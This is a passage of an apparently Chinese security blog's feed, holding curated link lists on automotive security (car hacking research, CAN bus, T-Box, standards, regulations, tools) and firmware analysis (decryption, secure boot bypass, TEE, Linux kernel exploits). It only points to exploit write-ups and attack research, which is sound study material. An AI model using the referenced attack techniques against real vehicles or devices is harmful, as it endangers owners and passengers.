案例</a></li></ul><h2 id="其他漏洞"><a href="#其他漏洞" class="headerlink" title="其他漏洞"></a>其他漏洞</h2><ul><li><a href="https://delikely.eu.org/2024/02/18/Cybellum-RCE/">Take a glance of browser, I find Cybellum RCE</a> <a href="https://cybellum.com/security-update-feb-24/">Security Update | Cybellum</a></li><li><a href="https://maxwelldulin.com/BlogPost?post=5370931200">Sears Garage Door Signal Reverse Engineering</a></li></ul><h2 id="隐私与数据安全"><a href="#隐私与数据安全" class="headerlink" title="隐私与数据安全"></a>隐私与数据安全</h2><ul><li><a href="https://foundation.mozilla.org/en/privacynotincluded/categories/cars/">Cars | Privacy & security guide | Mozilla Foundation</a></li><li><a href="https://www.top10vpn.com/research/electric-vehicle-privacy/">Privacy Investigation: Chinese Electric Vehicle Exports</a></li></ul><h2 id="技术研究"><a href="#技术研究" class="headerlink" title="技术研究"></a>技术研究</h2><ul><li><a href="https://0x44.cc/radio/2024/03/13/reversing-a-car-key-fob-signal.html">Reverse engineering a car key fob signal (Part 1)</a></li><li><a href="https://github.com/akrutsinger/tesla-charge-port-signal">tesla-charge-port-signal: Guided reverse engineering of Tesla’s charge port remote control signal</a></li><li><a href="https://www.usenix.org/conference/usenixsecurity13/dismantling-megamos-crypto-wirelessly-lockpicking-vehicle-immobilizer">Dismantling Megamos Crypto: Wirelessly Lockpicking a Vehicle Immobilizer | USENIX</a></li><li><a href="https://www.synacktiv.com/sites/default/files/2023-06/SecuriteDesVoitures.pdf">Security of connected vehicles</a></li><li><a href="https://bbs.pediy.com/thread-273814.htm">2022数字中国车联网安全CTF writeup - uds_server</a></li><li><a href="https://sites.google.com/view/cav-sec/msf-adv?pli=1">Invisible for both Camera and LiDAR: Security of Multi-Sensor Fusion based Perception in Autonomous Driving Under Physical-World Attacks</a></li><li><a href="https://arxiv.org/pdf/2210.09482.pdf">You Can’t See Me: Physical Removal Attacks on LiDAR-based Autonomous Vehicles Driving Frameworks</a></li><li><a href="https://comma-ai.medium.com/hacking-an-audi-performing-a-man-in-the-middle-attack-on-flexray-2710b1d29f3f">Hacking an Audi: performing a man-in-the-middle attack on FlexRay</a></li><li><a href="https://eprint.iacr.org/2020/937.pdf">BAM BAM!! On Reliability of EMFI for in-situ Automotive ECU Attacks?</a></li><li><a href="https://blog.willemmelching.nl/carhacking/2022/11/08/rh850-glitch/">Bypassing the Renesas RH850/P1M-E read protection using fault injection</a></li><li><a href="https://www.ndss-symposium.org/ndss-program/autosec-2022">Automotive and Autonomous Vehicle Security (AutoSec) Workshop 2022</a></li><li><a href="https://www.projectgus.com/2022/06/bmw-f-series-gear-selector-part-one-failures/">BMW F Series Gear Selector, Part One: Failures </a> <a href="https://www.projectgus.com/2022/06/bmw-f-series-gear-selector-part-two-breakthrough/">Part Two: Breakthrough </a> <a href="https://www.projectgus.com/2022/07/bmw-f-series-gear-selector-part-three-success/">Part Three: Success </a></li><li><a href="https://www.cymotive.com/whats-inside-the-cancan-can-in-can-attack-for-bypassing-security/">CANCAN: Encapsulation of CAN-FD Messages for Circumvention of Security Measures</a> <a href="https://www.cymotive.com/wp-content/uploads/2022/06/CANCAN-Research-paper_-Matan-Ziv-Principal-Cybersecurity-Researcher-1.pdf">Paper</a></li><li><a href="http://p1kachu.pluggi.fr/project/automotive/2021/05/30/honda-oki-part1/">Dumping old ECUs </a></li><li><a href="https://haxor.fi/how-the-firmware-updates-work-on-toyota-touch-go/">How the firmware updates work on Toyota Touch & Go</a></li><li><a href="https://tech-en.netlify.app/articles/en513036/index.html">How to decrypt car firmware in unknown format</a></li><li><a href="https://dl.acm.org/doi/fullHtml/10.1145/3465481.3465748">Analyzing and Securing SOME/IP Automotive Services with Formal and Practical Methods</a></li><li><a href="https://www.sciencedirect.com/science/article/pii/S0167404821003357">Power jacking your station: In-depth security analysis of electric vehicle charging station management systems</a> <a href="https://www.anquanke.com/post/id/267126">译文</a> </li><li><a href="https://www.cs.bham.ac.uk/~garciaf/publications/BtB.pdf">Beneath the Bonnet: a Breakdown of Diagnostic Security</a></li><li><a href="https://visteon.com/wp-content/uploads/2019/01/securing-inter-processor-communication-in-automotive-ecus.pdf">Securing Inter-Processor Communication in Automotive ECUs</a></li><li><a href="https://github.com/jilleb/mqb-soundaktor">mqb-soundaktor: 010 Editor template to parse the contents of MQB Soundaktor data</a></li><li><a href="https://blog.willemmelching.nl/carhacking/2022/01/02/vw-part1/">Hacking a VW Golf Power Steering ECU</a></li><li><a href="https://jazdw.net/tp20">VW Transport Protocol 2.0 (TP 2.0) for CAN bus</a></li><li><a href="https://hufman.github.io/stories/bmwconnectedapps">BMW Connected Apps Protocol</a><a href="https://bbs.pediy.com/thread-257530-1.htm">翻译</a></li><li><a href="https://www.rapid7.com/blog/post/2017/07/11/building-a-car-hacking-development-workbench-part-1/">Building a Car Hacking Development Workbench</a></li><li><a href="https://sites.google.com/view/cav-sec/cvanalyzer">AD & CV Systems Security - CVAnalyzer</a></li><li><a href="https://github.com/OSUSecLab/CANHunter">CANHunter:a tool for extracting CAN bus commands from car companion mobile apps</a></li><li><a href="https://github.com/jilleb/mib2-toolbox/issues/122">mib2-toolbox: Building a new install method · Issue #122</a></li><li><a href="https://www.trendmicro.com/en_us/research/21/l/examining-log4j-vulnerabilities-in-connected-cars.html">Examining Log4j Vulnerabilities in Connected Cars and Charging Stations</a></li><li><a href="https://olegkutkov.me/2021/06/10/tesla-model-3-us-lte-modem-replacement-and-some-reverse-engineering/">Tesla Model 3 US – LTE modem replacement (And some reverse engineering) </a></li><li><a href="https://pulsesecurity.co.nz/articles/ducati-696-canbus">Practical CANBUS Reversing - Understanding the Ducati Monster</a></li><li><a href="https://pulsesecurity.co.nz/articles/ducati-can-bus">Adventures with the Ducati CAN bus </a></li><li><a href="https://xz.aliyun.com/t/9629">该如何打下一台智能汽车</a></li><li><a href="https://bbs.pediy.com/thread-265243.htm">一类TBOX的介绍(有拿权限思路)</a></li><li><a href="https://gorgias.me/2019/08/08/浅谈4G通信模组在车联网领域的攻击场景/">浅谈4G通信模组在车联网领域的攻击场景</a></li><li><a href="https://osmocom.org/projects/quectel-modems/wiki/EC20">EC20 - Qualcomm Linux Modems by Quectel & Co - Open Source Mobile Communications</a></li><li><a href="https://www.blackmoreops.com/2016/06/02/hacking-qnx-systems-over-qconn/">Hacking QNX systems over QCONN</a></li><li><a href="https://skygo.360.cn/penetrate-intranet-via-tbox/">黑客是如何从T-Box接入车厂内网的</a></li><li><a href="https://fn.lc/post/tesla-model-3/">Hacking my Tesla Model 3 - Security Overview</a></li><li><a href="https://fn.lc/post/tesla-model-3-services/">Hacking my Tesla Model 3 - Internal API</a></li><li><a href="https://fn.lc/post/tesla-model-3-modes/">Hacking my Tesla Model 3 - Software Modes</a></li><li><a href="https://mp.weixin.qq.com/s/JNQIySegvXJ7QMFTe7cmJg">一次针对车联网平台恶意攻击行为的溯源分析</a></li><li><a href="http://plcscan.org/blog/2020/11/china-internet-of-vehicles-security-threat-analysis-report/">国内在线车联网平台(道路运输车辆卫星定位系统)安全威胁分析报告</a></li><li><a href="http://illmatics.com/Remote%20Car%20Hacking.pdf">Remote Car Hacking</a></li><li><a href="https://ioactive.com/pdfs/IOActive_Adventures_in_Automotive_Networks_and_Control_Units.pdf">Adventures in Automotive Networks and Control Units</a></li><li><a href="https://www.kiwisec.com/news/detail/5d3ab544c649181e28b820a7.html">智能汽车安全风险及防护技术分析</a></li><li><a href="https://www.usenix.org/legacy/events/sec10/tech/full_papers/Rouf.pdf">Security and Privacy Vulnerabilities of In-Car Wireless Networks: A Tire Pressure Monitoring System Case Study</a></li><li><a href="https://www.lookout.com/blog/hacking-a-tesla">Hacking a Tesla Model S: What we found and what we learned</a></li><li><a href="https://olegkutkov.me/2021/06/10/tesla-model-3-us-lte-modem-replacement-and-some-reverse-engineering/">Tesla Model 3 US – LTE modem replacement (And some reverse engineering)</a></li><li><a href="https://www.downtowndougbrown.com/2022/08/solving-my-trucks-tpms-sensor-problem-with-the-help-of-an-rtl-sdr-dongle/">Solving my truck’s TPMS sensor problem with the help of an RTL-SDR dongle</a></li><li><a href="https://www.usenix.org/conference/woot16/workshop-program/presentation/burakova">Truck Hacking: An Experimental Analysis of the SAE J1939 Standard</a></li><li><a href="http://www.autosec.org/publications.html">Automotive Embedded Systems Security (CAESS) </a></li><li><a href="https://etheses.bham.ac.uk/id/eprint/11516/1/VandenHerrewegen2021PhD.pdf">AUTOMOTIVE FIRMWARE EXTRACTION AND ANALYSIS TECHNIQUE</a></li><li><a href="http://www.autosec.org/pubs/cars-oakland2010.pdf">Experimental Security Analysis of a Modern Automobile</a></li><li><a href="http://opengarages.org/index.php/Main_Page">opengarages.org</a></li><li><a href="http://illmatics.com/carhacking.html">illmatics</a></li></ul><h2 id="会议"><a href="#会议" class="headerlink" title="会议"></a>会议</h2><ul><li><a href="https://media.ccc.de/v/37c3-12144-back_in_the_driver_s_seat_recovering_critical_data_from_tesla_autopilot_using_voltage_glitching">Back in the Driver’s Seat - Recovering Critical Data from Tesla Autopilot Using Voltage Glitching</a></li></ul><h2 id="论文"><a href="#论文" class="headerlink" title="论文"></a>论文</h2><ul><li><a href="https://arxiv.org/abs/2311.16024">MadRadar: A Black-Box Physical Layer Attack Framework on mmWave Automotive FMCW Radars</a></li><li><a href="https://www.brokenwire.fail/">Brokenwire Attack</a></li><li><a href="https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=10210500">Trusted Operations of a Military Ground Robot in the Face of Man-in-the-Middle Cyberattacks Using Deep Learning Convolutional Neural Networks: Real-Time Experimental Outcomes</a></li><li><a href="https://dl.acm.org/doi/10.1145/3488932.3523263">ShadowAuth: Backward-Compatible Automatic CAN Authentication for Legacy ECUs</a> <a href="https://github.com/purseclab/ShadowAuth">Github</a></li><li><a href="https://www.ndss-symposium.org/wp-content/uploads/2023/02/vehiclesec2023-23066-paper.pdf">Cooperative Perception for Safe Control of Autonomous Vehicles under LiDAR Spoofing Attacks</a></li><li><a href="https://www.usenix.org/conference/usenixsecurity16/technical-sessions/presentation/garcia">Lock It and Still Lose It —on the (In)Security of Automotive Remote Keyless Entry Systems</a></li><li><a href="https://www.usenix.org/conference/usenixsecurity19/presentation/kulandaivel">CANvas: Fast and Inexpensive Automotive Network Mapping</a></li><li><a href="https://www.usenix.org/conference/usenixsecurity21/presentation/hu-shengtuo">Automated Discovery of Denial-of-Service Vulnerabilities in Connected Vehicle Protocols</a></li><li><a href="https://securepositioning.com/ghost-peak/">Ghost Peak: Practical Distance Reduction Attacks Against HRP UWB Ranging</a></li><li><a href="https://www.usenix.org/conference/usenixsecurity21/presentation/groza">CANARY - a reactive defense mechanism for Controller Area Networks based on Active RelaYs</a></li></ul><h2 id="标准"><a href="#标准" class="headerlink" title="标准"></a>标准</h2><ul><li><a href="https://www.miit.gov.cn/api-gateway/jpaas-web-server/front/document/file-download?fileUrl=/cms_files/filemanager/1226211233/attach/20233/813c94607c204368aef325ffdd37f975.docx&fileName=1.《汽车整车信息安全技术要求》(征求意见稿).docx">《汽车整车信息安全技术要求》(征求意见稿)</a></li><li><a href="https://www.miit.gov.cn/cms_files/filemanager/1226211233/attach/20226/84d58a01e7fa48f4ad873d66542f2b1d.docx">《汽车软件升级通用技术要求》(征求意见稿)</a></li><li>ISO 26262 Road vehicles — Functional safety</li><li>SAE J3601 Cybersecurity Guidebook for Cyber-Physical Vehicle System</li><li><a href="https://www.iso.org/standard/70918.html">ISO/SAE 21434 Road vehicles — Cybersecurity engineering</a></li><li><a href="https://www.iso.org/standard/80840.html">ISO/PAS 5112:2022 Road vehicles — Guidelines for auditing cybersecurity engineering</a></li><li><a href="https://unece.org/sites/default/files/2021-03/R155e.pdf">WP.29 R155 Cyber security and Cyber Security Management System</a></li><li><a href="https://unece.org/sites/default/files/2021-03/R156e.pdf">WP.29 R156 Software Update Management System</a></li><li><a href="https://img.auto-testing.net/testingimg/202003/19/071723321.pdf">ISO 21448 SOTIF(预期功能安全)</a></li><li><a href="https://std.samr.gov.cn/gb/search/gbDetailed?id=0407B86E18DF0603E06397BE0A0A9871">GB 智能网联汽车时空数据安全处理基本要求(征求意见)</a></li><li><a href="https://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=4D3C5BB193E079AD54294E5845749B8F">GB/T 41871-2022 信息安全技术 汽车数据处理安全要求</a></li><li><a href="https://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=5D7C9B95DB5F844C84F2F6C08843E2BB">GB/T 41578-2022 电动汽车充电系统信息安全技术要求及试验方法</a> <a href="http://www.catarc.org.cn/upload/202009/11/202009111637288030.pdf">征求意见稿</a></li><li><a href="http://www.ttbz.org.cn/Pdfs/Index/?ftype=st&pms=62910">T/CSAE 252—2022 智能网联汽车车载端信息安全测试规程</a></li><li><a href="https://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=AC47DD65376598FB44E0F24FBEBBF769">GB/T 40855-2021 电动汽车远程服务与管理系统信息安全技术要求及试验方法</a></li><li><a href="http://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=9995D55CBCAE667570C36F6A6CD1712D">GB/T 40856-2021 车载信息交互系统信息安全技术要求及试验方法</a></li><li><a href="https://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=2977F0AC1719BBEFB9649C0146B0FC55">GB/T 40857-2021 汽车网关信息安全技术要求及试验方法</a></li><li><a href="https://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=CCE2A169871500F8029A9CBB314D9FB8">GB/T 40861-2021 汽车信息安全通用技术要求</a></li><li><a href="http://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=59F8899E944C9ED52288FE5E0146C621">GB/T 38628-2020 信息安全技术 汽车电子系统网络安全指南</a></li><li><a href="https://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=5D7C9B95DB5F844C84F2F6C08843E2BB">GB/T 41578-2022 电动汽车充电系统信息安全技术要求及试验方法</a></li><li><a href="https://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=5D7C9B95DB5F844C84F2F6C08843E2BB">GB/T 41578-2022: 电动汽车充电系统信息安全技术要求及试验方法</a></li><li><a href="https://www.cec.org.cn/upload/file/biaozhunhua/zhongdianlianbiaozhun/2019-09-29/508a7dfb58b92835782493dba29c5b54.pdf">T/CEC 208—2019 电动汽车充电设施信息安全技术规范</a></li><li><a href="https://www.tc260.org.cn/upload/2024-03-07/1709778432492016688.pdf">TC260-PG-20241A 网络安全标准实践指南—车外画面局部轮廓化处理效果验证</a></li><li><a href="https://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=4D3C5BB193E079AD54294E5845749B8F">GB/T 41871-2022 信息安全技术 汽车数据处理安全要求</a></li><li><a href="https://fjca.miit.gov.cn/cms_files/filemanager/450000788/attach/202210/bef32acc93c2405f9416ba7a5c3b6797.pdf">T/CCSA 339—2021 车联网网络安全防护定级备案实施指南</a></li></ul><h2 id="法规"><a href="#法规" class="headerlink" title="法规"></a>法规</h2><ul><li><a href="https://www.miit.gov.cn/jgsj/zbys/wjfb/art/2022/art_6d41506a06b9455092531a20f745f5a2.html">工业和信息化部办公厅 公安部办公厅 交通运输部办公厅 应急管理部办公厅 国家市场监督管理总局办公厅关于进一步加强新能源汽车企业安全体系建设的指导意见</a></li><li><a href="http://www.gov.cn/zhengce/zhengceku/2021-08/12/content_5630912.htm">工业和信息化部关于加强智能网联汽车生产企业及产品准入管理的意见</a></li><li><a href="http://www.cac.gov.cn/2021-11/14/c_1638501991577898.htm">网络数据安全管理条例(征求意见稿)</a></li><li><a href="https://www.miit.gov.cn/jgsj/waj/wjfb/art/2021/art_075b1bb3761943af96c4af9df4b4fb5b.html">工业和信息化部关于加强车联网卡实名登记管理的通知</a></li><li><a href="https://www.miit.gov.cn/jgsj/waj/wjfb/art/2021/art_27e00721fb6441fe99e9e2243bdccc78.html">工业和信息化部关于加强车联网网络安全和数据安全工作的通知</a></li><li><a href="http://www.miit-eidc.org.cn/art/2021/9/13/art_54_14395.html">关于开展汽车数据安全、网络安全等自查工作的通知</a></li><li><a href="http://www.cac.gov.cn/2021-08/20/c_1631049984897667.htm">汽车数据安全管理若干规定(试行)</a></li><li><a href="http://www.cac.gov.cn/2021-04/29/c_1621273432655484.htm">信息安全技术 网联汽车 采集数据的安全要求</a></li><li><a href="http://www.samr.gov.cn/zw/zh/202106/t20210604_330221.html">市场监管总局质量发展局关于汽车远程升级(OTA)技术召回备案的补充通知</a></li><li><a href="http://www.samr.gov.cn/zw/zh/202011/t20201125_323858.html">市场监管总局办公厅关于进一步加强汽车远程升级(OTA)技术召回监管的通知</a></li><li><a href="https://www.gov.cn/gongbao/content/2019/content_5380357.htm">道路机动车辆生产企业及产品准入管理办法</a> <a href="https://ythzxfw.miit.gov.cn/lawGuide?data=09c77831bd834a8fbec388a325dfb187">办事指南</a></li><li><a href="https://www.gov.cn/gongbao/content/2021/content_5641351.htm">网络产品安全漏洞管理规定</a></li></ul><h2 id="部委通知公告"><a href="#部委通知公告" class="headerlink" title="部委通知公告"></a>部委通知公告</h2><ul><li><a href="https://www.miit.gov.cn/jgsj/zbys/wjfb/art/2023/art_4a67648dc58e483bab554f97045a8579.html">工业和信息化部 公安部 住房和城乡建设部 交通运输部关于开展智能网联汽车准入和上路通行试点工作的通知 </a> <a href="https://wap.miit.gov.cn/jgsj/zbys/qcgy/art/2023/art_b3eb84d0090b462892ce0a41baf05bcb.html">图文解读</a></li></ul><h2 id="白皮书"><a href="#白皮书" class="headerlink" title="白皮书"></a>白皮书</h2><ul><li><a href="https://documents.trendmicro.com/assets/white_papers/wp-a-roadmap-to-secure-connected-cars.pdf">Identifying Cybersecurity Focus Areas in Connected Cars Based on WP.29 UN R155 Attack Vectors and Beyond</a></li><li><a href="https://mp.weixin.qq.com/s/IL1fIpylqImFie-vQcLDOg">腾讯安全《车联网数据安全体系建设指南》</a> <a href="https://share.weiyun.com/Wupmgp7r">附件</a></li><li><a href="http://qr61.cn/ooC4z0/q92oj9P">CSTC 智能网联汽车安全渗透白皮书 3.0(2022年)</a></li><li><a href="https://www.cstc.org.cn/zhinengwanglianqicheanquanshentoubaipishu2.0.pdf">CSTC 智能网联汽车安全渗透白皮书 2.0(2021年)</a></li><li><a href="https://www.ccidgroup.com/system/_content/download.jsp?urltype=news.DownloadAttachUrl&owner=1661492338&wbfileid=4701729">CSTC 智能网联汽车安全渗透白皮书(2020年)</a></li><li><a href="http://www.caict.ac.cn/kxyj/qwfb/bps/201912/P020191226516585677051.pdf">车联网白皮书(C-V2X分册)2019</a></li><li><a href="https://book.yunzhan365.com/juql/lfws/mobile/index.html">《智能网联汽车信息安全评测白皮书 2019》</a></li><li><a href="https://www.tc260.org.cn/file/qcdz.pdf">汽车电子网络安全标准化白皮书 2018</a></li></ul><h2 id="指南"><a href="#指南" class="headerlink" title="指南"></a>指南</h2><ul><li><a href="https://www.tc260.org.cn/file/jswj01.pdf">TC260-001《汽车采集数据处理安全指南》</a></li><li><a href="https://www.tc260.org.cn/file/2020-11-10/d7f8726e-d793-4ac2-8a5e-1a2ae701dd66.pdf">信息安全技术 网络预约汽车服务数据安全指南</a></li><li><a href="http://www.caict.ac.cn/xwdt/ynxw/202109/t20210924_390286.htm">《车联网身份认证和安全信任试点技术指南(1.0)》</a></li><li><a href="https://www.miit.gov.cn/zwgk/zcwj/wjfb/tz/art/2022/art_e36a55c43a3346c9a4b31e534b92be44.html">车联网网络安全和数据安全标准体系建设指南</a></li></ul><h2 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h2><ul><li><a href="https://github.com/collin80/SavvyCAN">SavvyCAN</a></li><li><a href="https://www.csselectronics.com/screen/page/can-logger-resources">CANEDGE</a></li><li><a href="https://github.com/jglim/OkayCAN">OkayCAN: The okayest ESP32-S2 CAN development board</a></li><li><a href="https://bitbucket.org/{944e74bb-4ed6-4df9-b1bb-d7581db48176}/">Dataspeed Autonomous Vehicle</a></li><li><a href="https://github.com/bri3d/VW_Flash">VW_Flash: Flashing tools for VW AG control units over UDS</a></li><li><a href="https://www.csselectronics.com/pages/obd2-pid-table-on-board-diagnostics-j1979">OBD2 PID Overview</a></li><li><a href="https://unlockecu.sn.sg/">UnlockECU</a></li></ul>]]></content>
<summary type="html"><p><a href="https://delikely.github.io/Automotive-Security-Timeline/">汽车信息安全事件时间轴</a>: <a href="https://delikely.github.io/Automotive-Securi</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>固件分析</title>
<link href="http://delikely.github.io/2099/01/01/firmware/"/>
<id>http://delikely.github.io/2099/01/01/firmware/</id>
<published>2099-01-01T11:30:00.000Z</published>
<updated>2023-07-29T13:57:42.582Z</updated>
<content type="html"><![CDATA[<h2 id="固件解密"><a href="#固件解密" class="headerlink" title="固件解密"></a>固件解密</h2><ul><li><a href="https://0x434b.dev/breaking-the-d-link-dir3060-firmware-encryption-static-analysis-of-the-decryption-routine-part-2-1/">Breaking the D-Link DIR3060 Firmware Encryption - Static analysis of the decryption routine - Part 2.1</a></li><li><a href="https://fastcall.medium.com/dumping-firmware-from-a-router-5d7e819199fd">Dumping firmware from a router</a></li><li><a href="https://paper.seebug.org/1651/">加密固件之依据老固件进行解密</a></li><li><a href="https://www.anquanke.com/post/id/246659">Linksys EA6100 固件解密分析</a></li><li><a href="https://www.jsof-tech.com/unpacking-hp-firmware-updates-part-1/">Unpacking HP Firmware Updates</a></li><li><a href="https://0x00sec.org/t/breaking-the-d-link-dir3060-firmware-encryption-recon-part-1/21943">Breaking the D-Link DIR3060 Firmware Encryption - Recon - Part 1</a></li><li><a href="https://0x00sec.org/t/breaking-the-d-link-dir3060-firmware-encryption-static-analysis-of-the-decryption-routine-part-2-1/22099">Breaking the D-Link DIR3060 Firmware Encryption - Static analysis of the decryption routine - Part 2.1</a></li></ul><h2 id="安全启动"><a href="#安全启动" class="headerlink" title="安全启动"></a>安全启动</h2><ul><li><a href="https://research.nccgroup.com/2022/10/03/shining-new-light-on-an-old-rom-vulnerability/">Shining New Light on an Old ROM Vulnerability: Secure Boot Bypass via DCD and CSF Tampering on NXP i.MX Devices</a></li><li><a href="https://fredericb.info/2022/06/breaking-secure-boot-on-google-nest-hub-2nd-gen-to-run-ubuntu.html">Breaking Secure Boot on Google Nest Hub (2nd Gen) to run Ubuntu</a></li><li><a href="https://cyberintel.es/publications/2022-12-07_BlackHat_Europe_pub/">Vlind Glitch: A Blind VCC Glitching Technique to Bypass the Secure Boot of the Qualcomm MSM8916 Mobile SoC</a></li><li><a href="https://fredericb.info/2021/02/amlogic-usbdl-unsigned-code-loader-for-amlogic-bootrom.html">amlogic-usbdl : unsigned code loader for Amlogic BootROM</a></li><li><a href="https://raelize.com/posts/espressif-esp32-bypassing-encrypted-secure-boot-cve-2020-13629/">Espressif ESP32: Bypassing Encrypted Secure Boot (CVE-2020-13629)</a></li><li><a href="https://limitedresults.com/2019/11/pwn-the-esp32-forever-flash-encryption-and-sec-boot-keys-extraction/">Pwn the ESP32 Forever: Flash Encryption and Sec. Boot Keys Extraction(CVE-2019-17391)</a></li><li><a href="https://limitedresults.com/2019/09/pwn-the-esp32-secure-boot/">Pwn the ESP32 Secure Boot</a></li><li><a href="https://limitedresults.com/2019/08/pwn-the-esp32-crypto-core/">Pwn the ESP32 crypto-core</a></li><li><a href="https://limitedresults.com/2020/01/nuvoton-m2351-mkrom-armv8-m-trustzone/">Nuvoton M2351 MKROM</a></li><li><a href="https://eclypsium.com/2020/07/29/theres-a-hole-in-the-boot/">CVE-2020-10713 BootHole: THERE’S A HOLE IN THE BOOT</a></li></ul><h2 id="Bypass"><a href="#Bypass" class="headerlink" title="Bypass"></a>Bypass</h2><ul><li><a href="https://research.nccgroup.com/2022/11/17/cve-2022-45163/">NXP i.MX SDP_READ_DISABLE Fuse Bypass (CVE-2022-45163) </a></li><li><a href="http://analogman.info/index.php/2019/01/20/bypass-secure-usb-debugging-prompt-on-phone-with-broken-screen/">Bypass secure USB debugging prompt on phone with broken screen</a></li><li><a href="https://www.riverloopsecurity.com/blog/2020/10/hw-101-glitching/">Hardware Hacking 101: Glitching into Privileged Shells</a></li></ul><h2 id="TEE"><a href="#TEE" class="headerlink" title="TEE"></a>TEE</h2><ul><li><a href="https://services.google.com/fh/files/misc/intel_tdx_-_full_report_041423.pdf">Intel Trust Domain Extensions (TDX) Security Review</a></li><li><a href="https://www.synacktiv.com/en/publications/kinibi-tee-trusted-application-exploitation.html">Kinibi TEE: Trusted Application exploitation</a></li><li><a href="https://www.synopsys.com/blogs/software-security/cve-2020-7958-trustlet-tee-attack/">CyRC analysis: CVE-2020-7958 biometric data extraction in Android devices</a></li><li><a href="https://cyberintel.es/publications/2022-11-17_DeepSec_pub/">Auditing Closed Source Trusted Applications for Qualcomm Secure Execution Environment (QSEE) | Cyber Intelligence</a></li><li><a href="https://research.checkpoint.com/2022/researching-xiaomis-tee/">Researching Xiaomi’s TEE to get to Chinese money</a></li><li><a href="https://github.com/shakevsky/keybuster">keybuster: a research tool that allows to interact with the Keymaster TA (Trusted Application) on Samsung devices</a></li><li><a href="https://blog.zimperium.com/multiple-kernel-vulnerabilities-affecting-all-qualcomm-devices/">Kernel Vulnerabilities Affecting All Qualcomm Devices</a></li><li><a href="https://limitedresults.com/2020/01/nuvoton-m2351-mkrom-armv8-m-trustzone/">Nuvoton M2351 MKROM</a></li><li><a href="https://toothless.co/blog/bootloader-bypass-part1/">NXP LPC1343 Bootloader Bypass (Part 1) - Communicating with the bootloader</a></li><li><a href="https://toothless.co/blog/bootloader-bypass-part2/">NXP LPC1343 Bootloader Bypass (Part 2) - Dumping firmware with Python and building the logic for the glitcher</a></li><li><a href="https://toothless.co/blog/bootloader-bypass-part3/">NXP LPC1343 Bootloader Bypass (Part 3) - Putting it all together</a></li><li><a href="https://raelize.com/blog/qualcomm-ipq40xx-analysis-of-critical-qsee-vulnerabilities/">Qualcomm IPQ40xx: Analysis of Critical QSEE Vulnerabilities</a></li></ul><h2 id="固件分析"><a href="#固件分析" class="headerlink" title="固件分析"></a>固件分析</h2><ul><li><a href="https://rdomanski.github.io/Reverse-engineering-of-ARM-Microcontrollers/">Reverse engineering of ARM microcontrollers</a></li><li><a href="https://www.riverloopsecurity.com/blog/2021/07/nand-dump-repair/">Repairing a Broken Huawei NAND Dump and Single-Bit Errors</a></li><li><a href="https://www.anquanke.com/post/id/233361">Zyxel设备eCos固件加载地址分析</a></li><li><a href="https://bbs.pediy.com/thread-267719.htm">固件安全之加载地址分析</a></li><li><a href="http://www.righto.com/2020/09/reverse-engineering-first-fpga-chip.html">Reverse-engineering the first FPGA chip, the XC2064</a></li><li><a href="https://boredpentester.com/reversing-esp8266-firmware-part-1/">Reversing ESP8266 Firmware</a></li><li><a href="https://scriptingxss.gitbook.io/firmware-security-testing-methodology/v/zhong-wen-fstm/">OWASP固件安全性测试指南</a></li></ul><h2 id="内核漏洞"><a href="#内核漏洞" class="headerlink" title="内核漏洞"></a>内核漏洞</h2><ul><li><a href="https://github.com/lrh2000/StackRot">StackRot: CVE-2023-3269: Linux kernel privilege escalation vulnerability</a></li><li><a href="https://github.com/Liuk3r/CVE-2023-32233">CVE-2023-32233: Linux内核中的安全漏洞</a></li><li><a href="https://1day.dev/notes/Linux-Kernel-n-day-exploit-development/">CVE-2020-27786 | Linux Kernel n-day exploit development</a></li><li><a href="https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html?m=1">Exploiting CVE-2022-42703 - Bringing back the stack attack</a></li><li><a href="https://research.nccgroup.com/2023/02/06/rustproofing-linux-part-1-4-leaking-addresses/">Rustproofing Linux (Part 1/4 Leaking Addresses)</a></li><li><a href="https://github.com/TH3xACE/SUDO_KILLER">SUDO_KILLER: A tool to identify and exploit sudo rules’ misconfigurations and vulnerabilities within sudo for linux privilege escalation</a></li><li><a href="https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story">Kernel Pwning with eBPF: a Love Story</a></li><li><a href="https://flatt.tech/assets/reports/210401_pwn2own/whitepaper.pdf">PWN2OWN Local Escalation of Privilege Category Ubuntu Desktop Exploit</a></li><li><a href="https://github.com/tr3ee/CVE-2021-4204">CVE-2021-4204: Linux Kernel eBPF Local Privilege Escalation</a></li><li><a href="https://accessvector.net/2022/linux-itimers-uaf?s=09">Racing Cats to the Exit: A Boring Linux Kernel Use-After-Free</a></li><li><a href="https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016/">How The Tables Have Turned: An analysis of two new Linux vulnerabilities in nf_tables</a></li><li><a href="https://blog.exodusintel.com/2022/12/19/linux-kernel-exploiting-a-netfilter-use-after-free-in-kmalloc-cg/">Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg</a></li></ul><h2 id="IPC"><a href="#IPC" class="headerlink" title="IPC"></a>IPC</h2><ul><li><a href="https://cutesmilee.github.io/kernel/linux/android/2022/02/17/cve-2019-2215_writeup.html">CVE-2019-2215 | Android Binder UAF allows an elevation of privilege from an application to the Linux Kernel</a></li></ul>]]></content>
<summary type="html"><h2 id="固件解密"><a href="#固件解密" class="headerlink" title="固件解密"></a>固件解密</h2><ul>
<li><a href="https://0x434b.dev/breaking-the-d-link-dir3060-</summary>
<category term="IOT" scheme="http://delikely.github.io/tags/IOT/"/>
</entry>
<entry>
<title>IOT 漏洞收集</title>
<link href="http://delikely.github.io/2099/01/01/IOT-Vulns/"/>
<id>http://delikely.github.io/2099/01/01/IOT-Vulns/</id>
<published>2099-01-01T11:00:00.000Z</published>
<updated>2024-05-26T17:13:02.297Z</updated>
